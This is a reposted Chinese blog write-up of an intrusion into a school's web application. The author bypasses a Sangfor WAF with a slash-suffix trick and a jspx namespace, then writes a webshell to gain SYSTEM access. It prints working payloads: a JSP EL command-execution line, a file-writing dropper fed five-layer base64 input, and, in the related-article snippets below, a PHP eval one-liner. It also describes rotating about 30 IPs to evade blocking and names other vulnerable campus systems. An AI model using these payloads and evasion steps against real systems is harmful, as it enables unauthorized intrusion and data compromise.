记一次绕过waf的任意文件上传

最新推荐文章于 2024-07-21 13:08:14 发布
最新推荐文章于 2024-07-21 13:08:14 发布
阅读量473 收藏
点赞数
分类专栏: 内网渗透 文章标签: 安全 web安全
原文链接:https://xz.aliyun.com/t/11337
版权

声明

以下内容,来自先知社区的John作者原创,由于传播,利用此文所提供的信息而造成的任何直接或间接的后果和损失,均由使用者本人负责,长白山攻防实验室以及文章作者不承担任何责任。

前言

前几天对自己学校进行的一次渗透测试,由于深信服过于变态,而且拦截会直接封ip,整个过程有点曲折,期间进行了后缀名绕过,jspx命名空间绕过、获取网站根目录、base64五层编码写入shell等操作。

0x01 获取网站接口

主界面:

图片

上传点:

图片

由于该应用是内嵌企业微信的套皮Html,所以我们首先用Burp Suite抓包获取接口和cookie

图片

任意文件上传:

图片

0x02 后缀名绕过

代码不限制后缀名,但是waf限制呀!

后缀名jsp,jspx会拦截,但是jspp,jspxx等不会拦截。

所以要利用windows特性绕过,常规的绕过手法例如末尾加点号、::$DATA均无法绕过

图片

经过fuzz,发现正斜杠可以绕过

图片

0x03 内容绕过

常见的jsp标记均无法绕过

图片

图片

所以我们得绕过JSP标记检测,这里参考了yzddmr6师傅的两种绕过方法:

  • jspEL表达式绕过

  • jspx命名空间绕过

第一种是利用${}标记:

payload:

${Runtime.getRuntime().exec(request.getParameter("x"))}

但深信服waf过滤了一句话,需要变形绕过,鄙人太菜了,不了解相关函数的变形绕过,所以选择第二种写法

第二种是利用命名空间的特性:

参照yzddmr6师傅的图:

图片

使用自定义的命名空间,替换掉jsp的关键字,将原本的替换成jsp:scriptlet

这样waf的正则匹配不到自然就会放行

<hi xmlns:hi="http://java.sun.com/JSP/Page">
    <hi:scriptlet>
        out.println(30*30);
    </hi:scriptlet>
</hi>

图片

图片

0x04 获取网站路径

这里我们不能用相对路径来写入webshell,因为Tomcat与Apache不同,根目录并不是以代码运行位置决定所在的目录,而是默认为Tomcat/bin作为根目录

# 获取当前的根目录 
String path = System.getProperty("user.dir"); out.println(path);

图片

# 获取web项目所在的目录 
String path = application.getRealPath("test.jsp"); out.println(path);

图片

所以写入shell的绝对路径应为

D:/tomcat8/webapps/declare/static/upload/test.jsp

0x05 编码或加密绕过waf写入shell

菜鸡的payload:

<hi xmlns:hi="http://java.sun.com/JSP/Page">
    <hi:directive.page import="java.util.Base64,java.io.*"/>
    <hi:scriptlet>
        File file = new File("D:/tomcat8/webapps/declare/static/upload/test.jsp");
        FileWriter fileOut = new FileWriter(file);
        Base64.Decoder base64 = Base64.getDecoder();
        byte[] str = base64.decode(base64.decode(base64.decode(base64.decode(base64.decode(request.getParameter("x").getBytes("utf-8"))))));
        try {
            fileOut.write(new String(str, "utf-8"));
            out.println("写入成功");
        } catch (Exception e) {
            e.printStackTrace();
        } finally {
            try {
                if (fileOut != null) {
                    fileOut.close();
                }
        } catch (Exception e) {
                e.printStackTrace();
            }
        }
    </hi:scriptlet>
</hi>

一开始我是用两层base64编码,还是被检测了,经过fuzz发现五层编码即可绕过。

鄙人太懒了,不想重新造轮子。如果各位师傅有时间的话,遇到这种waf建议用RSA、AES等加密算法绕过

图片

成功getshell,System权限

图片

看了一眼依赖,可能存在log4j2和jackson的RCE,留着下次当靶场继续测试

图片

0x06 总结

深信服的waf算挺强了,而且也足够恶心,检测可疑行为直接封ip,光是fuzz就用掉了快30个ip了。

学校其他站点有thinkphp5.0.23 RCE、泛微8.0前台sql注入的漏洞,但都有这个waf,实在没有耐心一个个fuzz。

本菜鸡第一次写文,如有错误或建议欢迎指出,各位师傅们轻喷

原文链接:

https://xz.aliyun.com/t/11337

长白山攻防实验室
关注
专栏目录
45-1 waf绕过 - 文件上传绕过WAF方法
weixin_43263566的博客
06-04 252
打开dvwa靶场,先将靶场的安全等级调低,然后切换到文件上传
任意文件上传绕过waf+本地防火墙双重防护
墨痕诉清风的博客
10-28 957
因为这种单位很喜欢将自己的服务器部署在C段的分散的IP上,于是猜测,这个类似官网网站的站点也很有可能就搭建在这个超链接的C段上,我们不妨 host 碰撞一下,如果找到了真实IP的话,那么就可能绕过waf。但是这里内容检测还是过不了,但是不会显示云 waf 地址或者 502了,猜测肯定是过了 cdn, 但是不知道是什么拦截住了(可能为本地的硬件防火墙)时,就可以过内容检测,不知道市面上有没有这种类型的webshell,我找了一圈好像都有。尝试了一下,发现content-Encoding居然可以绕过
上传绕过WAF的tips大全
weixin_30855761的博客
07-20 171
原始默认状态: ——WebKitFormBoundary2smpsxFB3D0KbA7D Content-Disposition: form-data; name=”filepath”; filename=”backlion.asp” Content-Type: text/html 突破0,文件名前缀加[0x09]绕过: ——WebKitFormBoundary2smpsxF...
24 WEB漏洞-文件上传WAF绕过安全修复_阿里云盾waf绕过怎么修复
最新发布
qq_53058639的博客
07-21 744
我这个测试是没有必要的,这只是说大家以后碰到同类的防护软件,不管是安全狗还是宝塔,安全公司里面的产品,那么大家在研究的时候,也是这么个研究方法,大家不要自己绕过绕过了,我们学的是研究的方法后期只要脑瓜子灵活一点,是没有任何问题是可以绕过的,方法学不到,那讲了也是白讲,我希望大家学的是绕过的方法,以后自己就能做这个事情。.php,它的意义是很明显的,因为安全狗也是程序,当它碰到截断,也是会截断的,后面的.php就没有匹配到,最后上传的后缀是.php就行了。这是垃圾数据的一个典型情况,末尾是要加;
WAF绕过文件上传
wangluoanquan111的博客
02-25 1717
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
文件上传之,waf绕过(24)
san3144393495的博客
05-20 1549
前期upload第二关的时候,判断的方式就是mime的类型的绕过绕过miem是图片类型就可以上传,没有验证后缀,这是代码的判断,我们在来探针一下防护软件是怎么判断的,现在第二关上传一个图片上去,抓住数据包,mime满足就可以上传,所以把上传的文件名字改成php格式,本来这是可以正常上传成功的。mime可以作为一个验证条件,验证mime来判断你个文件一个合法性的时候,可以通过更改mime来达到一个伪造,比如上传一个php文件,这时候可以更改为图片类来尝试绕过mime验证。
WEB漏洞-文件上传WAF绕过安全修复
qq_54190167的博客
04-11 913
WEB漏洞-文件上传WAF绕过安全修复
文件上传绕过waf的方法
licheric的博客
11-14 669
原始请求包: ——WebKitFormBoundary2smpsxFB3D0KbA7D Content-Disposition: form-data; name=”filepath”; filename=”cesafe.asp” Content-Type: text/html 方法1,文件名前缀加[0x09]绕过: ——WebKitFormBoundary2smpsxFB3D0KbA7D Content-Disposition: form-data; name=”filepath”; filename=”[
文件上传绕过_文件上传绕过Waf
weixin_39650091的博客
12-06 623
文件上传实质上还是客户端的POST请求,消息主体是一些上传信息。前端上传页面需要指定enctype为multipart/from-data才能正常上传文件。此处不讲各种中间件解析漏洞 只列举几种safe_dog对脚本文件上传拦截的绕过靶机环境:win2003+safe_dog4.0.23957+webug中的上传1、换行Content-Disposition: form-data; na...
重生之我是赏金猎人(十二)-一次与飞塔流量检测对抗的文件上传1
08-03
在尝试利用任意文件上传功能时,遇到了飞塔公司的WAF和流量检测设备,这为绕过安全防护增加了难度。 0x02 摸清检测规则 飞塔的WAF以其强大的检测能力而著称。作者试图直接上传一个免杀webshell,但被迅速拦截。...
如何绕过检测上传php文件,shell上传绕过检测方法
weixin_36026440的博客
03-11 718
文件上传漏洞是所有漏洞中最为直接,有效的获取服务器权限的方法。但是想要利用好他并不容易,因为他的上传姿势实在是太过花哨(多)。所以这里介绍一些简单的上传姿势。望大牛误喷shell上传条件:1、上传点2、绝对路径3、要有权限文件上传检验姿势1、客户端javascript校验(一般只校验后缀名)2、服务端校验①文件头content-type字段校验(image/gif)②文件内容头校验(GIF89a)...
上传绕过WAF的15中姿势
06-29
绕过WAF进行文件上传的文旦,可以学习一些姿势加以利用。
WAF绕过的各种方法总结.pdf
07-09
WAF绕过的各种方法总结总结语2019年7月9日,仅供学习参考,请勿用于非法用途
分享一个AntSword过waf的小技巧1
08-03
这种方法虽然不能保证100%成功,但确实增加了绕过WAF的几率,尤其是在面对基于规则的WAF时。 需要注意的是,WAF的防护机制日益复杂,很多现代的WAF系统不仅检查关键字,还会分析请求模式、行为特征等多维度信息。...
文件上传小结——文件上传漏洞、文件上传校验姿势、文件上传绕过、文件包含漏洞、服务器解析漏洞……
7Riven's blog
12-02 680
文件上传文件上传可以与文件包含相结合 1.文件上传漏洞: 文件上传漏洞需要的前提条件: 能上传木马 上传的木马能执行 还要清楚上传后的路径 一句话木马:<?php @eval($_POST[cmd]);?> eval 执行命令函数 思路: 编写一个一句话木马<?php?> 上传一句话木马 上菜刀 图片马制作: 找个图片,用事本打开,添加一句话 ...
2021/12/3文件上传-WAF绕过和修复
weixin_44532761的博客
12-05 367
配置虚拟机 less-2 我这还没操作呢就被拦截了o(*≧▽≦)ツ┏━┓,而且我还没启动safedog 疑惑了不知道关哪里 换个关卡把 less3 上传参数名解析:明确哪些东西能修改? Content-Disposition:响应头指示回复的内容该以何种形式展示(表单-一般可更改) 表单名称(这里一般不能改,和前端代码一致) ...
第24天:WEB漏洞-文件上传WAF绕过安全修复
cailme的博客
05-30 611
渗透测试day24
一次waf绕过实战
内心不种满鲜花就会长满杂草
01-10 3193
一次渗透测试中,网站使用的是域名进行访问。当我尝试进行一些攻击行为时,发现存在waf,我的行为被进行了拦截,实在头疼 此时,我猜想此网站应该是使用了云waf,接着我对域名进行全球ping检测,发现解析出来的ip超过1个,该网站使用了CDN 接下来,进行寻找真实ip。我借助fofa工具。 1. 首先我将网站的title信息进行复制 2. 使用fofa搜索 title="xx登录" 如下,有几个搜索结果。其中一个域名就是我的目标站点,下面存在对应的ip地址。但是我不知道该ip是不是网..
24 WEB漏洞-文件上传WAF绕过安全修复
山兔的博客
08-25 1391
我这个测试是没有必要的,这只是说大家以后碰到同类的防护软件,不管是安全狗还是宝塔,安全公司里面的产品,那么大家在研究的时候,也是这么个研究方法,大家不要自己绕过绕过了,我们学的是研究的方法后期只要脑瓜子灵活一点,是没有任何问题是可以绕过的,方法学不到,那讲了也是白讲,我希望大家学的是绕过的方法,以后自己就能做这个事情。.php,它的意义是很明显的,因为安全狗也是程序,当它碰到截断,也是会截断的,后面的.php就没有匹配到,最后上传的后缀是.php就行了。这是垃圾数据的一个典型情况,末尾是要加;
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值